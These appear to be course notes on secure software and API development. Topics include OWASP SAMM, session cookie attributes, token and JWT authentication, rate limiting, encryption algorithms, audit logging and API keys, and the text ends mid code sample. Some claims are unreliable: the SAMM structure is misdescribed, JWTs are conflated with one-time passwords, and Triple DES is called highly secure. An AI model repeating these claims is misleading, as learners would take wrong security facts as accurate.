 Evaluate an organization’s existing software security practices


 Build a balanced software security assurance program in well-defined iterations
 Demonstrate concrete improvements to a security assurance program
 Define and measure security-related activities throughout an
organization



Dell uses OWASP's Software Assurance Maturity Model (OWASP SAMM) to help focus our
resources and determine which components of our secure application development program
to prioritize. (Michael J. Craigue, Information Security & Compliance, Dell, Inc.)

SAMM is maintained by the Open Web Application Security Project (OWASP) and
provides an effective and measurable way for all types of organizations to analyze and
improve their software security posture.

Key Components of SAMM:

1. Governance:
 Objective: Establish and maintain the appropriate level of software security
governance.
 Activities: Define and implement policies, roles, responsibilities, and
processes to support software security.
2. Construction:
 Objective: Ensure that security activities are integrated into the software
development process.
 Activities: Apply security practices during the development phase,
including requirements, design, coding, and testing.
3. Verification:
 Objective: Implement security practices to confirm that software is secure and
meets requirements.
 Activities: Conduct security testing, code review, and use automated tools
to verify the security of the software.
4. Deployment:
 Objective: Develop and implement strategies to deploy software securely.
 Activities: Ensure secure configuration, perform secure deployment, and
monitor
security during deployment.
5. Operations:
 Objective: Manage and respond to software security issues in deployed software.
 Activities: Establish incident response and management processes, conduct
regular security operations, and monitor for security incidents.
6. Continuous Improvement:
 Objective: Continuously improve the software security process.
 Activities: Collect and analyze metrics, conduct retrospectives, and refine
security
practices based on lessons learned.

SAMM Levels:

Five maturity levels can be described for each of the six domains mentioned above:

1. Level 1 - Initial:
Description: The organization has started considering software security.



 Characteristics: Reactive, ad-hoc practices, and minimal security measures.
2. Level 2 - Defined:
 Description: Security activities are defined and documented.
 Characteristics: Basic processes in place, some level of consistency.
3. Level 3 - Consistent:
 Description: Security practices are consistently applied across the organization.
 Characteristics: Well-defined and consistent processes, proactive measures.
4. Level 4 - Managed:
 Description: The organization actively manages and measures its security
practices.
 Characteristics: Metrics-driven, continuous improvement, proactive security
measures.
5. Level 5 - Optimizing:
 Description: Continuous optimization and improvement of security practices.
 Characteristics: Continuous feedback loops, adaptive and innovative security
measures.

SAMM Implementation:

Organizations can use SAMM to assess their current state and define a roadmap for
improving their software security practices. The model provides guidance on activities and
practices at each maturity level, allowing organizations to incrementally enhance their
software security posture.
Benefits:

 Measurable Improvement: SAMM allows organizations to measure their maturity and
progress in software security over time.
 Customizable Approach: SAMM is flexible and can be adapted to suit the specific
needs and context of different organizations.
 Comprehensive Framework: SAMM covers various aspects of the software development
lifecycle, providing a holistic approach to software security.
 Community Support: Being an OWASP project, SAMM benefits from
community collaboration and contributions.

For the most recent and detailed information on SAMM, check the OWASP website or other
authoritative sources; the field of software security evolves quickly, and the model continues
to be updated.



UNIT III SECURE API DEVELOPMENT
API Security- Session Cookies

API security is a crucial aspect of web application security, and session cookies play a significant
role in securing user sessions. Here are some best practices and considerations for securing
session cookies in the context of API security:

1. Use Secure and HttpOnly Flags:


 Set the Secure flag to ensure that the cookie is only sent over secure
(HTTPS) connections, preventing it from being transmitted over
unencrypted channels.
 Set the HttpOnly flag to prevent client-side scripts from accessing the cookie. This
helps mitigate the risk of cross-site scripting (XSS) attacks.

Set-Cookie: sessionid=abc123; Secure; HttpOnly

2. Implement SameSite Attribute:


 Set the SameSite attribute to control when cookies are sent with cross-site
requests. This helps mitigate the risk of cross-site request forgery (CSRF)
attacks.
 Use SameSite=Lax for a more lenient policy or SameSite=Strict for a stricter
policy.
Set-Cookie: sessionid=abc123; Secure; HttpOnly; SameSite=Strict

3. Set a Reasonable Expiry Time:


 Define an appropriate expiration time for session cookies to limit the
exposure of session data. Shorter expiration times reduce the risk associated
with stolen or leaked cookies.
Set-Cookie: sessionid=abc123; Secure; HttpOnly; SameSite=Strict; Max-Age=3600
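
The same attributes can be set from server-side code; a minimal sketch assuming a Flask handler (the framework choice, route, and cookie name are illustrative):

from flask import Flask, make_response
import secrets

app = Flask(__name__)

@app.route("/login", methods=["POST"])
def login():
    resp = make_response("logged in")
    # Secure + HttpOnly + SameSite=Strict + bounded lifetime, as above.
    resp.set_cookie("sessionid", secrets.token_urlsafe(32),
                    secure=True, httponly=True, samesite="Strict", max_age=3600)
    return resp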

4. Use Session Token Rotation:


 Implement session token rotation to invalidate and reissue session
tokens periodically. This practice makes it more difficult for attackers
to exploit a compromised session.
5. Implement Token Revocation:
 Provide a mechanism to revoke and invalidate session tokens in case of a
security incident or when a user logs out. This helps ensure that even if a
token is compromised, it can be rendered useless.
6. Secure Storage of Tokens:
 Ensure that session tokens are securely stored on the client side. Consider
using techniques like HTTP-only cookies and secure storage mechanisms
(e.g., sessionStorage) to prevent unauthorized access.
7. Logging and Monitoring:
 Implement robust logging and monitoring for your API to detect and respond
to any suspicious activities or potential security incidents related to session
cookies.
8. Regular Security Audits:
 Conduct regular security audits and code reviews to identify and



address potential vulnerabilities in the authentication and session
management mechanisms.



9. Stay Informed on Security Best Practices:
 Keep yourself informed about the latest security best practices and standards
related to API security and session management.

By following these best practices, you can enhance the security of session cookies in your API,
reducing the risk of various common web application vulnerabilities.
Token Based Authentication
Digital transformation brings security concerns for users who need to protect their identity
from prying eyes. According to Norton, on average about 800,000 (8 lakh) accounts are
hacked every year. There is therefore a demand for high-security systems and cybersecurity
regulations for authentication.
Traditional methods rely on single-level authentication with a username and password to
grant access to web resources. Users tend to keep easy passwords or reuse the same
password on multiple platforms for their convenience. The fact is, there is always a wrong
eye on your web activities, looking to take unfair advantage in the future.
Due to the rising security load, two-factor authentication (2FA) came into the picture and
introduced token-based authentication. This process reduces the reliance on password
systems and adds a second layer of security. Let's jump straight to the mechanism.
But first of all, let’s meet the main driver of the process: a T-O-K-E-N !!!
What is an Authentication Token?
A Token is a computer-generated code that acts as a digitally encoded signature of a user.
They are used to authenticate the identity of a user to access any website or application
network.
A token is classified into two types: A Physical token and a Web token. Let’s
understand them and how they play an important role in security.
 Physical token: A Physical token use a tangible device to store the information of
a user. Here, the secret key is a physical device that can be used to prove the
user’s identity. Two elements of physical tokens are hard tokens and soft tokens.
Hard tokens use smart cards and USB drives to grant access to restricted networks,
like those used in corporate offices to authenticate employees. Soft tokens use a
mobile device or computer to send an encrypted code (like an OTP) via an
authorized app or SMS.
 Web token: The authentication via web token is a fully digital process. Here, the
server and the client interface interact upon the user’s request. The client sends
the user credentials to the server and the server verifies them, generates the
digital signature, and sends it



back to the client. Web tokens are popularly known as JSON Web Token
(JWT), a standard for creating digitally signed tokens.
A token is a popular word used in today’s digital climate. It is based on decentralized
cryptography. Some other token-associated terms are Defi tokens, governance tokens, Non
Fungible tokens, and security tokens. Tokens are purely based on encryption which is
difficult to hack.
What is a Token-based Authentication?
Token-based authentication is a two-step authentication strategy to enhance the security
mechanism for users to access a network. Users register their credentials once and receive
a unique encrypted token that is valid for a specified session time. During this session,
users can directly access the website or application without logging in again. It enhances
the user experience by saving time, and security by adding a layer to the password system.
A token is stateless, as it does not save information about the user in the database. The
system is based on cryptography: once the session is complete, the token is destroyed.
This gives it an advantage over passwords, which attackers can steal and reuse to access resources.
The most friendly example of the token is OTP (One Time password) which is used to verify
the identity of the right user to get network entry and is valid for 30-60 seconds. During the
session time, the token gets stored in the organization’s database and vanishes when the
session expired.
Let’s understand some important drivers of token-based authentication-
 User: A person who intends to access the network carrying his/her username
& password.
 Client-server: A client is a front-end login interface where the user first
interacts to enroll for the restricted resource.
 Authorization server: A backend unit handling the task of verifying the
credentials, generating tokens, and send to the user.
 Resource server: It is the entry point where the user enters the access token. If
verified, the network greets users with a welcome note.
How does Token-based Authentication work?
Token-based authentication has become a widely used security mechanism used by internet
service providers to offer a quick experience to users while not compromising the security
of their data. Let’s understand how this mechanism works with 4 steps that are easy to
grasp.



How Token-based Authentication works?

1. Request: The user intends to enter the service with login credentials on the application or
the website interface. The credentials involve a username, password, smartcard, or
biometrics
2. Verification: The login information from the client-server is sent to the authentication
server for verification of valid users trying to enter the restricted resource. If the credentials
pass the verification, the server generates a secret digital key and sends it to the user via HTTP
in the form of a code. The token is sent in the JWT open standard format, which includes:
 Header: It specifies the type of token and the signing algorithm.
 Payload: It contains information about the user and other data
 Signature: It verifies the authenticity of the user and the messages transmitted.
3. Token validation: The user receives the token code and enters it into the resource server to
grant access to the network. The access token has a validity of 30-60 seconds and if the user
fails to apply it can request the Refresh token from the authentication server. There’s a limit
on the number of attempts a user can make to get access. This prevents brute force attacks
that are based on trial and error methods.
4. Storage: Once the resource server has validated the token and granted access to the user, the
token is stored in a database for the session time you define. The session time differs for
every website or app. For example, bank applications have the shortest session times, of
about a few minutes only.
So, here are the steps that clearly explain how token-based authentication works and what
are the main drivers driving the whole security process.
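
A minimal sketch of issuing and verifying such a token, assuming the PyJWT library (the key and claim values are illustrative):

import jwt  # PyJWT

key = "server-side-secret"  # illustrative; store securely in practice

# The header (alg/typ) is added by the library; the payload carries user data.
token = jwt.encode({"sub": "user42", "role": "customer"}, key, algorithm="HS256")

# Verification recomputes the signature; a tampered token raises an error.
claims = jwt.decode(token, key, algorithms=["HS256"])
print(claims["sub"])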
Note: Today, with growing innovation, security regulations are becoming stricter to
ensure that only the right people have access to their resources. Tokens are occupying
more space in the security process due to their ability to store information in encrypted
form and to work on both websites and applications to maintain and scale the user
experience. Hopefully this section gave you the know-how of token-based authentication
and how it helps ensure that crucial data is not misused.
Securing Natter APIs:



1. Authentication:

 Token-Based Authentication:
 Use token-based authentication mechanisms like JWT or OAuth for secure user
authentication. This ensures that only authorized users can access your APIs.
 API Keys:
 If applicable, use API keys for access control. Keep these keys secure and avoid
exposing them in client-side code.

2. Authorization:

 Role-Based Access Control (RBAC):
 Implement RBAC to control what actions users or systems can perform within
the API. Assign specific roles and permissions to users.
 Scope Management:
 If using OAuth, manage and validate scopes to restrict access to specific
resources or actions.

3. Secure Communication:

 HTTPS:
 Always use HTTPS to encrypt data in transit. This prevents eavesdropping and
man-in-the-middle attacks.
 TLS/SSL:
 Keep your TLS/SSL certificates up to date. Use strong cipher suites and
protocols.

4. Input Validation:

 Sanitize Inputs:
 Validate and sanitize all inputs to prevent injection attacks. This is crucial to
protect against SQL injection, XSS, and other common vulnerabilities.

5. Rate Limiting:

 Implement Rate Limiting:


 Protect your API from abuse by implementing rate limiting. This prevents
attackers from overwhelming your system with too many requests.



6. Logging and Monitoring:

 Log API Activities:
 Implement logging for all API activities. This aids in auditing, debugging, and
identifying potential security incidents.
 Monitoring and Alerts:
 Set up monitoring to detect unusual patterns or suspicious activities. Configure
alerts to notify administrators of potential security threats.
7. Error Handling:

 Custom Error Messages:


 Provide generic error messages to clients to avoid exposing sensitive information.
Log detailed errors on the server side for internal debugging.

8. Data Protection:

 Encryption:
 Encrypt sensitive data at rest. If your API deals with sensitive information,
ensure that it is stored securely.
 Data Masking:
 Implement data masking techniques to hide parts of sensitive information in
responses.

9. API Versioning:

 Versioning:
 Implement versioning to ensure that changes to your API don’t break existing
clients. This allows for a smoother transition when introducing new features or
security enhancements.

10. Security Headers:

 HTTP Security Headers:
 Utilize security headers like Content Security Policy (CSP), Strict-Transport-
Security (HSTS), and others to enhance the security of your API.
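
A minimal sketch of attaching these headers to every response, assuming a Flask application; the header values are illustrative and should be tuned per application:

from flask import Flask

app = Flask(__name__)

@app.after_request
def add_security_headers(resp):
    # Force HTTPS for a year, restrict sources of content, and disable MIME sniffing.
    resp.headers["Strict-Transport-Security"] = "max-age=31536000; includeSubDomains"
    resp.headers["Content-Security-Policy"] = "default-src 'self'"
    resp.headers["X-Content-Type-Options"] = "nosniff"
    return resp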

11. Security Testing:

 Regular Security Audits:


 Conduct regular security audits and penetration testing to identify and
remediate vulnerabilities.



 Static and Dynamic Analysis:
 Use tools for static and dynamic code analysis to identify potential security
issues in your codebase.

12. Education and Training:

 Developer Training:
 Train developers on secure coding practices and keep them informed about the
latest security threats and best practices.

By incorporating these best practices, you can significantly enhance the security of your Natter
APIs or any other APIs in your application ecosystem. Remember that security is an ongoing
process, and it's essential to stay vigilant and proactive in addressing emerging threats.



Addressing threats with Security Controls

1. Threat: Unauthorized Access

Security Controls:

 Authentication:
 Implement strong authentication mechanisms such as multi-factor
authentication (MFA) to verify the identity of users.
 Access Control:
 Use role-based access control (RBAC) to ensure that users have the minimum
necessary permissions for their roles.
 Account Lockout Policies:
 Implement account lockout policies to prevent brute-force attacks.

2. Threat: Data Breach

Security Controls:

 Encryption:
 Encrypt sensitive data at rest and in transit to protect it from unauthorized
access.
 Data Loss Prevention (DLP):
 Implement DLP solutions to monitor and prevent the unauthorized transfer of
sensitive information.
 Regular Audits:
 Conduct regular audits and vulnerability assessments to identify and remediate
security weaknesses.

3. Threat: Malware and Ransomware

Security Controls:

 Antivirus Software:
 Use reputable antivirus software to detect and remove malware.
 User Education:
 Educate users about the risks of downloading or clicking on suspicious links,
reducing the likelihood of malware infections.
 Regular Software Updates:
 Keep all software and systems up to date with the latest security patches to
address vulnerabilities.

4. Threat: Insider Threats

Security Controls:



 User Training:
 Train employees on security policies and the potential risks associated with
insider threats.
 Monitoring and Auditing:
 Implement user activity monitoring and conduct regular audits to detect and
respond to suspicious behavior.
 Least Privilege Principle:
 Follow the principle of least privilege to ensure that users have only the necessary
permissions for their roles.

5. Threat: DDoS Attacks

Security Controls:

 Traffic Filtering:
 Use traffic filtering solutions to detect and mitigate DDoS attacks.
 Content Delivery Networks (CDNs):
 Employ CDNs to distribute traffic and absorb DDoS attacks.
 Incident Response Plan:
 Develop and regularly test an incident response plan to quickly respond to and
mitigate the impact of DDoS attacks.

6. Threat: SQL Injection

Security Controls:

 Input Validation:
 Implement thorough input validation to prevent SQL injection attacks.
 Parameterized Queries:
 Use parameterized queries or prepared statements to interact with databases
securely.
 Web Application Firewalls (WAF):
 Deploy WAFs to monitor and filter HTTP traffic between a web application and
the Internet.



7. Threat: Phishing Attacks

Security Controls:

 Email Filtering:
 Use email filtering solutions to detect and block phishing emails.
 User Training:
 Conduct regular training sessions to educate users about recognizing and
avoiding phishing attempts.
 Multi-Factor Authentication (MFA):
 Implement MFA to add an additional layer of security, even if credentials are
compromised.
8. Threat: Lack of Security Updates

Security Controls:

 Patch Management:
 Establish a robust patch management process to ensure timely application of
security updates.
 Vulnerability Scanning:
 Regularly scan systems for vulnerabilities and prioritize patching based on
criticality.
 System Monitoring:
 Implement continuous monitoring to quickly identify and address
vulnerabilities.

9. Threat: Social Engineering Attacks

Security Controls:

 User Education:
 Train users to be cautious about sharing sensitive information and to verify the
legitimacy of requests.
 Strict Access Controls:
 Implement strict access controls to limit access to sensitive information.
 Incident Response Plan:



 Have an incident response plan in place to handle social engineering incidents
promptly.

10. Threat: Physical Security Risks

Security Controls:

 Access Controls:
 Implement access controls for physical premises, restricting entry to authorized
personnel.
 Surveillance Systems:
 Use surveillance systems to monitor and record activities in critical physical
locations.
 Visitor Logs:
 Maintain visitor logs to track individuals entering and leaving secure areas.

Implementing a comprehensive security strategy that combines these controls helps


organizations build a robust defense against a variety of threats. Regular testing, monitoring, and
updating security practices are essential for maintaining a strong security posture over time.

Rate Limiting for Availability


Rate limiting is a crucial mechanism for maintaining availability and preventing abuse or
malicious attacks on your systems. By



restricting the rate at which certain actions or requests can be performed, rate limiting helps
protect your resources, ensure fair usage, and mitigate the risk of denial-of-service (DoS)
attacks. Here are some considerations and best practices for implementing rate limiting for
availability:

### 1. **Define Sensible Limits:**


- Set appropriate rate limits based on the nature of your application and the expected
usage patterns. Striking a balance between preventing abuse and allowing legitimate users to
access your resources is essential.

### 2. **Differentiate Between Types of Requests:**


- Categorize and prioritize different types of requests. For example, critical API
endpoints might have lower rate limits than less critical ones.

### 3. **Implement Burst Limits:**


- Consider implementing burst limits to allow short bursts of higher activity, but still
enforcing overall rate limits over longer periods.
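
A minimal token-bucket sketch in Python that enforces a sustained rate while permitting short bursts, in line with points 1-3 above (all parameter values are illustrative):

import time

class TokenBucket:
    def __init__(self, rate_per_sec, burst):
        self.rate = rate_per_sec       # sustained refill rate
        self.capacity = burst          # burst limit
        self.tokens = burst
        self.updated = time.monotonic()

    def allow(self):
        now = time.monotonic()
        # Refill proportionally to elapsed time, capped at the burst capacity.
        self.tokens = min(self.capacity, self.tokens + (now - self.updated) * self.rate)
        self.updated = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False  # caller should return HTTP 429 with a clear error message

bucket = TokenBucket(rate_per_sec=5, burst=20)  # ~5 req/s sustained, bursts up to 20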

### 4. **Dynamic Rate Limiting:**


- Implement dynamic rate limiting that adjusts based on the current load or usage
patterns. This can help adapt to changing circumstances and prevent sudden spikes in traffic
from causing disruptions.

### 5. **User Authentication and Rate Limits:**


- Tie rate limiting to user authentication. Authenticated users might have higher limits
than unauthenticated users. This helps to identify and control abusive behavior by specific
users.

### 6. **Provide Clear Error Messages:**


- When a user exceeds the rate limit, provide clear and informative error
messages. This helps legitimate users



understand why their request was denied and what actions they can take.

### 7. **Include Rate Limiting in SLAs:**


- Clearly define rate limits in your service level agreements (SLAs) and terms of service.
This sets expectations for users and helps you enforce limits as part of your contractual
agreement.

### 8. **Monitor and Analyze Traffic:**


- Implement monitoring tools to track and analyze traffic patterns. This helps you
identify potential abuse or anomalies that may require adjustments to your rate limiting
strategy.

### 9. **Distributed Rate Limiting:**


- If your application is distributed, implement rate limiting mechanisms across all
components to ensure consistent enforcement and avoid vulnerabilities in specific parts
of your infrastructure.

### 10. **Consider Geographical Factors:**


- Depending on your application, you might need to consider geographical factors.
Implement rate limiting based on the geographic location of users to account for regional
variations in usage patterns.

### 11. **Graceful Degradation:**


- Implement mechanisms for graceful degradation during periods of high traffic or when
rate limits are reached. Provide a user-friendly experience and prioritize essential
functionalities.

### 12. **Regularly Review and Adjust:**


- Periodically review your rate limiting strategy. Adjust rate limits based on evolving
usage patterns, changes in your application, or emerging security threats.

### 13. **Failover and Redundancy:**



- Ensure that your rate limiting mechanisms are part of your overall availability strategy.
Implement failover mechanisms and redundancy to maintain service availability even if
certain components experience issues.

### 14. **Communicate Changes:**


- If you need to adjust rate limits, communicate these changes proactively to your user
base. Transparency helps in managing user expectations and reducing frustration.

By implementing these best practices, you can leverage rate limiting to enhance the
availability of your services and protect your infrastructure from potential abuse or attacks.
Encryption
Encryption in cryptography is a process by which plain text or a piece of information is
converted into cipher text, a form that can only be decoded by the receiver for whom the
information was intended. The algorithm used for the process of encryption is known
as a cipher. Encryption helps protect consumer information, emails and other sensitive
data from unauthorized access, and it secures communication networks. There are many
algorithms to choose from when looking for one that meets our requirements; the
following four encryption algorithms are widely regarded as highly secure.
o Triple DES: Triple DES is a block cipher algorithm that was created to replace its
older version, the Data Encryption Standard (DES). The 56-bit key of DES was
found to be too small to prevent brute-force attacks, so Triple DES was
introduced with the purpose of enlarging the key space without any requirement
to change the algorithm. It has a key length of 168 bits (three 56-bit DES keys),
but due to the meet-in-the-middle attack the effective security is only about 112
bits. Triple DES suffers from slow performance in software, though it is well
suited for hardware implementation. Presently, Triple DES has largely been
replaced by AES (Advanced Encryption Standard).

o RSA:
RSA is an asymmetric key algorithm named after its creators Rivest,
Shamir and Adleman. The algorithm is based on the fact that factoring a large
composite number into its prime factors is difficult (prime factorization). RSA
generates a public key and a private key: the public key is used to convert plain
text to cipher text, and the private key is used to convert cipher text back to
plain text. The public key is accessible to everyone, whereas the private key is
kept secret, and the two keys are kept different, making RSA a secure
algorithm for data security.
o Twofish:
The Twofish algorithm is the successor of the Blowfish algorithm. It was
designed by Bruce Schneier, John Kelsey, Doug Whiting, David Wagner, Chris
Hall and Niels Ferguson. It is a block cipher that uses a single key of length 256
bits and is said to be efficient both for software that runs on smaller processors,
such as those in smart cards, and for embedding in hardware. It allows
implementers to trade off encryption speed, key setup time, and code size to
balance performance. Designed by Bruce Schneier's Counterpane Systems,
Twofish is unpatented, license-free, and freely available for use.
o AES:
The Advanced Encryption Standard, abbreviated AES, is a symmetric block
cipher chosen by the United States government to protect significant
information and used to encrypt sensitive data in hardware and software.
AES is a fixed 128-bit block cipher with key sizes of 128, 192 and 256 bits.
The AES design is based on a substitution-permutation network (SPN) and
does not use the Data Encryption Standard (DES) Feistel network.
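
A minimal sketch of authenticated symmetric encryption, assuming the third-party Python cryptography package; its Fernet construction uses AES with an HMAC integrity check under the hood:

from cryptography.fernet import Fernet

key = Fernet.generate_key()   # symmetric key; must be stored and shared securely
f = Fernet(key)

token = f.encrypt(b"card=4111111111111111")  # cipher text plus integrity tag
plain = f.decrypt(token)                     # raises InvalidToken if tampered with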
Future Work:
With advancements in technology it becomes easier to encrypt data, and with neural
networks it becomes easier to keep data safe. Neural networks from Google Brain have
been used to create encryption without being taught the specifics of any encryption
algorithm. Data scientists and cryptographers are finding ways to prevent brute-force
attacks on encryption algorithms to avoid any unauthorized access to sensitive data.
Encryption is a fundamental technique in cybersecurity used to secure sensitive
information by converting it into a format that is unintelligible without the appropriate key
to decrypt it. Here are some key aspects of encryption:

### Types of Encryption:

1. **Symmetric Encryption:**
- Uses a single key for both encryption and decryption.



- Fast and efficient but requires a secure way to share the key.

2. **Asymmetric Encryption (Public-Key Cryptography):**


- Uses a pair of public and private keys.
- Public key is used for encryption, and the private key is used for decryption.
- Eliminates the need for a secure key exchange but can be slower than symmetric
encryption.

### Common Encryption Algorithms:

1. **AES (Advanced Encryption Standard):**


- Widely used symmetric encryption algorithm.
- Provides strong security and efficiency.

2. **RSA (Rivest-Shamir-Adleman):**
- Common asymmetric encryption algorithm.
- Key pair includes a public key for encryption and a private key for decryption.

3. **DSA (Digital Signature Algorithm):**


- Used for digital signatures, a form of asymmetric cryptography.

4. **ECC (Elliptic Curve Cryptography):**


- Provides strong security with shorter key lengths compared to traditional algorithms.
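
A minimal sketch of asymmetric encryption with RSA-OAEP, again assuming the Python cryptography package (the key size and message are illustrative):

from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes

private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

oaep = padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                    algorithm=hashes.SHA256(), label=None)

ciphertext = public_key.encrypt(b"session key material", oaep)  # anyone may encrypt
plaintext = private_key.decrypt(ciphertext, oaep)               # only the key owner decrypts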

### Use Cases for Encryption:

1. **Data in Transit:**
- Encrypts data as it travels over networks (e.g., HTTPS for secure web
communication).

2. **Data at Rest:**
- Encrypts stored data on devices or servers to prevent unauthorized access.

3. **End-to-End Encryption:**
- Ensures that data is encrypted from the sender to the recipient, preventing
intermediaries from accessing the content.

4. **File and Disk Encryption:**


- Encrypts entire files or disks to protect against unauthorized access.



5. **Email Encryption:**
- Secures the content of emails to maintain confidentiality.

### Best Practices for Encryption:

1. **Key Management:**
- Implement secure key management practices to protect encryption keys.

2. **Regularly Update Algorithms:**


- Stay informed about the latest encryption algorithms and update as needed to maintain
security.

3. **Use Strong Passwords/Keys:**


- Employ long and complex passwords or keys to enhance security.

4. **Secure Transmission of Keys:**


- If using symmetric encryption, ensure a secure method for key exchange.

5. **Implement Perfect Forward Secrecy:**


- Ensure that compromise of a long-term key does not compromise past sessions.

6. **Consider Hardware Security Modules (HSMs):**


- Use HSMs to provide extra protection for cryptographic keys.

7. **Encrypt Sensitive Metadata:**


- Consider encrypting not only the data but also any sensitive metadata associated
with it.

8. **Understand Compliance Requirements:**


- Be aware of and adhere to relevant compliance requirements regarding data encryption.

9. **Regular Audits and Monitoring:**


- Conduct regular audits to ensure encryption implementation is secure.
Monitor for any suspicious activities.

10. **Combine Encryption with Other Security Measures:**


- Use encryption as part of a comprehensive security strategy that includes access
controls, authentication, and monitoring.

11. **Keep Software and Systems Updated:**


- Regularly update encryption software and systems to patch vulnerabilities.

Encryption is a critical component in safeguarding sensitive information and maintaining the
confidentiality and integrity of data in various digital environments. Organizations must
carefully implement and manage encryption to ensure its effectiveness in protecting against
potential threats.
Audit logging
Audit logging, also known as security logging or event logging, is a crucial
component of an organization's cybersecurity strategy. It involves the systematic
recording of events and activities within an information system, network, or
application. The primary purpose of audit logging is to provide a detailed record of
security-relevant events, enabling organizations to monitor, analyze, and respond to
potential security incidents. Here are key aspects of audit logging:

Objectives of Audit Logging:

1. Detection of Anomalies:
 Identify unusual or suspicious activities that may indicate security
threats.
2. Incident Investigation:
 Provide a detailed trail of events for forensic analysis in the event of a
security incident.
3. Compliance and Accountability:
 Demonstrate compliance with regulatory requirements by maintaining
records of access and changes.
4. User Activity Monitoring:
 Monitor and log user activities to ensure adherence to security policies
and detect unauthorized actions.
5. Alerting and Notification:
 Generate alerts and notifications based on predefined criteria to
facilitate rapid response to security events.

Components of Audit Logging:

1. Event Sources:
 Identify and define the sources of events to be logged, such as
operating systems, applications, databases, and network devices.
2. Event Types:
 Categorize events into types, including login attempts, file access,
configuration changes, and other security-relevant actions.
3. Logging Format:
 Define a standardized format for log entries, including timestamp,
event type, user ID, IP address, and other relevant details.

4. Log Retention Policy:
 Establish a policy for the retention of logs, considering legal and
compliance requirements.
5. Access Controls:
 Implement access controls to ensure that only authorized personnel can
view or modify log files.
6. Encryption:
 Consider encrypting log files to protect sensitive information contained within
them.
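
As a minimal sketch of the logging format described above, the following uses only Python's standard logging module and writes one JSON object per line to a hypothetical audit.log file, so entries can later be shipped to a central aggregator:

```python
import json
import logging
from datetime import datetime, timezone

audit = logging.getLogger("audit")
audit.setLevel(logging.INFO)
audit.addHandler(logging.FileHandler("audit.log"))  # hypothetical destination

def log_event(event_type: str, user_id: str, source_ip: str, outcome: str) -> None:
    """Record one security-relevant event with the standardized fields."""
    entry = {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "event_type": event_type,   # e.g. login, file_access, config_change
        "user_id": user_id,
        "source_ip": source_ip,
        "outcome": outcome,         # e.g. success or failure
    }
    audit.info(json.dumps(entry))

log_event("login", "alice", "203.0.113.7", "failure")
```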

Best Practices for Audit Logging:

1. Include Relevant Information:


 Log information that is pertinent to security, such as user logins, failed
login attempts, privilege escalations, and critical system changes.
2. Timestamp Accuracy:
 Ensure accurate and synchronized timestamps in log entries to facilitate
correlation and analysis.
3. Centralized Logging:
 Implement centralized logging to aggregate logs from multiple
sources, aiding in comprehensive analysis.
4. Regular Monitoring:
 Regularly monitor and review logs to detect and respond to security
events promptly.
5. Alerting Mechanisms:
 Implement alerting mechanisms to notify security personnel of
suspicious or critical events in real-time.
6. Regular Audits:
 Conduct periodic audits of log files to verify the integrity and
completeness of the recorded events.
7. User Education:
 Educate users on the importance of audit logging and the potential
consequences of improper activities.
8. Protection Against Tampering:
 Implement measures to protect logs from tampering or unauthorized
deletion.
9. Automated Log Analysis:
 Employ automated log analysis tools to identify patterns or anomalies
that may not be immediately apparent.
10. Regularly Update Logging Configuration:
 Review and update logging configurations as systems and applications evolve.
11. Documentation:
 Document the logging process, including the types of events recorded
and the retention policy.

Audit logging is an integral part of a comprehensive cybersecurity strategy, providing organizations with valuable insights into their security postures and aiding in the identification of and response to security incidents.

Securing service-to-service APIs


This Chapter Covers
 Authenticating services with API keys and JWTs
 Using OAuth2 for authorizing service-to-service API calls
 TLS client certificate authentication and mutual TLS
 Credential and key management for services
 Making service calls in response to user requests
In previous chapters, authentication has been used to determine which user is accessing an
API and what they can do. It’s increasingly common for services to talk to other services
without a user being involved at all. These service-to-service API calls can occur within a
single organization, such as between microservices, or between organizations when an API is
exposed to allow other businesses to access data or services. For example, an online retailer
might provide an API for resellers to search products and place orders on behalf of
customers. In both cases, it is the API client that needs to be authenticated rather than an end
user. Sometimes this is needed for billing or to apply limits according to a service contract,
but it’s also essential for security when sensitive data or operations may be performed.
Services are often granted wider access than individual users, so stronger protections may be
required because the damage from compromise of a service account can be greater than any
individual user account. In this chapter, you’ll learn how to authenticate services and
additional hardening that can be applied to better protect privileged accounts, using advanced
features of OAuth2.
Note
The examples in this chapter require a running Kubernetes installation configured according
to the instructions in appendix B.

Securing service-to-service APIs involves implementing measures to protect the communication and data exchange between different components or services within a system. This is crucial to ensure the confidentiality, integrity, and availability of the information being transmitted. Here's a brief explanation and definition:

Definition: Securing service-to-service APIs refers to the implementation of security measures to safeguard the interaction and data transfer between different services in a software architecture. This process aims to prevent unauthorized access and data breaches, and to ensure the overall integrity and reliability of the system.

Brief Explanation: In modern software development, systems are often composed of multiple services that need to communicate with each other through APIs (Application Programming Interfaces). Securing these APIs is essential to protect sensitive data and maintain the trustworthiness of the entire system.

Security measures may include implementing encryption (e.g., HTTPS) to protect data in transit,
authentication mechanisms to ensure that only authorized services can communicate,
authorization controls to manage access to specific resources, and various other practices to
mitigate potential vulnerabilities.

Securing service-to-service APIs is a critical aspect of overall system security, especially in distributed architectures like microservices. It involves a combination of encryption, authentication, access controls, and monitoring to create a robust defense against potential threats and attacks, ensuring that the interconnected services can operate securely and trust each other in a controlled manner.
API Keys

API keys are a common form of authentication used in web and software development to control
access to web services, APIs (Application Programming Interfaces), or other types of resources.
An API key is essentially a code passed in by computer programs calling an API to identify the
calling program and ensure that it has the right to access the requested resources.

Here's a more detailed explanation:

Definition: An API key is a unique identifier, often a long string of alphanumeric characters, that
is issued to developers or applications accessing an API. It serves as a form of token-based
authentication, allowing the API provider to identify and authorize the source of incoming
requests. API keys are commonly used in both public and private APIs to control access and
monitor usage.

How API Keys Work:

1. Issuance: The API provider generates and issues a unique API key to developers or
applications that need to access the API.
2. Inclusion in Requests: Developers include the API key in the headers or parameters of
their API requests. This key serves as a credential, allowing the API provider to identify the
source of the request.
3. Authentication: When an API request is received, the API provider checks the included
API key to verify its authenticity. If the key is valid and authorized for the requested
resource, the API provider processes the request; otherwise, it denies access.
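
The authentication step can be sketched with a small Flask endpoint; the header name, key value, and key store below are hypothetical, and a production service would load keys from a database or secrets manager:

```python
import hmac

from flask import Flask, abort, request  # pip install flask

app = Flask(__name__)

# Hypothetical key store mapping issued keys to their owners.
VALID_KEYS = {"k7f2a91c0d4e": "reporting-service"}

@app.route("/v1/orders")
def list_orders():
    supplied = request.headers.get("X-API-Key", "")
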